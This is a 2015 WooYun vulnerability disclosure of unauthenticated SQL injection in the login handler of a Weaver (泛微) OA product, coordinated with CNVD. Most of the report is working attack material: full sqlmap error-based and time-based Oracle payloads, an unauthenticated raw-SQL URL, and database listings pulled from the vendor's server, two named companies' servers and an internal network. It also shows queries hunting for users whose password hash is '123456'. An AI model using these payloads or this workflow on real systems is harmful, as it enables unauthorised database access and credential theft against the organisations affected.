当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124589

漏洞标题:泛微某通用系统存在SQL注入漏洞(无需登录)

相关厂商:cncert国家互联网应急中心

漏洞作者: 浮萍

提交时间:2015-07-05 15:27

修复时间:2015-08-23 17:14

公开时间:2015-08-23 17:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-05: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

SQL注入

详细说明:

以官方为例
http://pm.weaver.cn:9085/main/login.jsp

选区_003.png


用户名sysadmin 密码任意 提示密码错误
当用户名输入sysadmin'时

选区_004.png


提示

org.springframework.jdbc.BadSqlGrammarException: StatementCallback; bad SQL grammar [select longonname from sysuser where lower(longonname)=lower('sysadmin'')]; nested exception is java.sql.SQLSyntaxErrorException: ORA-01756: 引号内的字符串没有正确结束


选区_005.png


初步判断为oracle数据库
然后抓包

http://pm.weaver.cn:9085/j_acegi_security_check?dynamicpass=&encData=&ip=xxxxx&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin'&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin'


qlmap identified the following injection points with a total of 213 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: http://pm.weaver.cn:9085/j_acegi_security_check?dynamicpass=&encData=&ip=127.0.0.1&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin') AND 9205=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9205=9205) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND ('bDuh'='bDuh&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: http://pm.weaver.cn:9085/j_acegi_security_check?dynamicpass=&encData=&ip=127.0.0.1&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin') AND 4148=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(112)||CHR(75)||CHR(104),5) AND ('nMaw'='nMaw&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin
---


为oracle数据库
有37个数据库

back-end DBMS: Oracle
available databases [37]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EWEAVER
[*] EWEAVER5TEST
[*] EWEAVERINHOUSE
[*] EWEAVERTEST
[*] EXFSYS
[*] FTOA01
[*] FTPOM
[*] HR
[*] HTF
[*] IX
[*] MDSYS
[*] MOBILEDEMO
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PMECOLOGY
[*] POWER
[*] POWER01
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEAVERIM
[*] WFPM
[*] WMSYS
[*] XDB
[*] ZTDBA
[*] ZTKG
[*] ZZB
[*] ZZBMIS3


当前库为

current schema (equivalent to database on Oracle):    'EWEAVERINHOUSE'


登录的用户表为SYSUSER
查看用户数

选区_006.png


同样查看一下密码为123456的人

select  count(*) from SYSUSER where LOGONPASS  = 'e10adc3949ba59abbe56e057f20f883e'


选区_007.png


select LOGONPASS from SYSUSER where LONGONNAME = 'sysadmin';

查看sysadmin密码,可惜解密收费 就不再解密登录了
另外官网也可以执行sql
查看数据库版本

http://pm.weaver.cn:9085/ServiceAction/com.eweaver.base.DataAction?sql=|20select|20*|20from|20v$version|20where|20rownum|20=|201


选区_008.png


登录采用了明文密码登录

漏洞证明:

案例
http://oa.ad-mart.cn

选区_009.png


http://oa.ad-mart.cn/j_acegi_security_check?dynamicpass=&encData=&ip=127.0.0.1&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin*&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin*" --dbs


数据库

available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


选区_010.png


密码为123456的用户

选区_011.png


http://mail.weifu.com.cn

选区_012.png


"http://mail.weifu.com.cn/j_acegi_security_check?dynamicpass=&encData=&ip=127.0.0.1&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin*&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin*" --dbs


数据库

available databases [21]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OAWEIFU
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEIFU
[*] WMSYS
[*] XDB


用户select count(*) from sysuser;: '1345'
某公司内网

"http://10.0.0.*/j_acegi_security_check?dynamicpass=&encData=&ip=127.0.0.1&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin*&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin*" --dbs


数据库

available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


查看用户
并分别查询一下密码为123456 0000 000000的用户

选区_014.png

修复方案:

过滤~~

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-09 17:13

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无